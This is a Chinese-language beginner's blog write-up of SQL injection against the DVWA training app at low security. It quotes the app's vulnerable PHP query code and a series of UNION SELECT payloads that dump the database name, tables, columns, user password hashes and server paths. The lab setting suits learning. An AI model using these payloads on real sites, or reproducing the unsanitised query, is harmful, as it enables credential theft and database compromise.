dvwa学习sql注入 low级别

秒速五厘米 2022-05-30 11:27 185阅读 0赞

刚刚学习web安全，老师第二节课就让用dvwa学习sql注入了，下面是我自己通过书上的学习以及在dvwa摸索的过程，求大牛们多多指点，勿要喷我![闭嘴][shutup.gif]

## 级别：Low ##

![70][]

从页面上看到，有一个可以提交查询内容的地方

我们可以通过以下步骤判断这里是否存在注入点

① 输入1  提交

![70 1][]

②输入1' 提交

![70 2][]

③输入1 and 1=1 提交

![70 3][]

④输入1 and 1=2提交

![70 4][]

由上可以看出是存在注入点的，  我们猜测sql查询语句是这样的：

select First name的列名 and Surname的列名 from 表名 where id的列名 ='我们输入的id'

我们看一下这里的源码  果然真的是这样，没有任何过滤

`<?php if( isset( $_REQUEST[ 'Submit' ] ) ) {     // Get input     $id = $_REQUEST[ 'id' ];     // Check database     $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";     $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );     // Get results     while( $row = mysqli_fetch_assoc( $result ) ) {         // Get values         $first = $row["first_name"];         $last  = $row["last_name"];         // Feedback for end user         echo "<pre>ID: { $id}<br />First name: { $first}<br />Surname: { $last}</pre>";     }     mysqli_close($GLOBALS["___mysqli_ston"]); }`

`?> `

那么我们首先爆出它的库试试，用单引号让id闭合

输入 1' union select 1,database()\#提交

![70 5][]

可以看出目前使用的数据库为dvwa，接下来我们爆表试试

输入 1' union select 1,table\_name from information\_schema.tables where table\_name='dvwa'\#

![70 6][]

可以看到有两个表，我们爆一下users的列，

输入1' union select 1,column\_name from information\_schema.columns where table\_name='users'\#

![70 7][]

可以看出有好多的列，但是重要的应该是user列和password列，我们爆出这两列的字段内容

输入 1' union select 1,concat(user,password) from users\#

![70 8][]

或者输入 1' union select 1,concat\_ws(char(32,58,32),user,password) from users\#

这里32为空格  58位冒号  输出显示内容就是 user ： password

![70 9][]

这里就差不多把重要的数据都给爆出来了，只不过是加密后的  可以直接在线解密

接下来我们训练一下其他的注入

查看数据库路径、mysql安装路径和操作系统

输入 1' union select 1,concat(@@datadir,@@basedir,@@version\_compile\_os)\#

![70 10][]

就先玩这么多了  今后再努力学习  大家也好好加油~

[shutup.gif]: /images/20220530/c256b6b667344fd0942008ab7d4863a9.png
[70]: /images/20220530/2ec90857dfdf4452bfafe1b897b16d3c.png
[70 1]: /images/20220530/d1296fcbe0324532b8f02560c4b0cd49.png
[70 2]: /images/20220530/400d422dd58f4485bf4fed3bf5c39fa5.png
[70 3]: /images/20220530/0eeec4821fc44d83bdce31d652f2fdc1.png
[70 4]: /images/20220530/ad38e25ef3184956bc19e945d63dbf09.png
[70 5]: /images/20220530/d703373102b24438a352856d0019779d.png
[70 6]: /images/20220530/5d87c8ab736540c6b2e891813557135d.png
[70 7]: /images/20220530/fb52325c3c664342a6d91c5f98015b46.png
[70 8]: /images/20220530/41fac45b89f34e8e9f43f10d44ae2044.png
[70 9]: /images/20220530/61e720c64a3540849cef683c01d4e8da.png
[70 10]: /images/20220530/74bd5a62d30a423d9c049afcc9ede0e1.png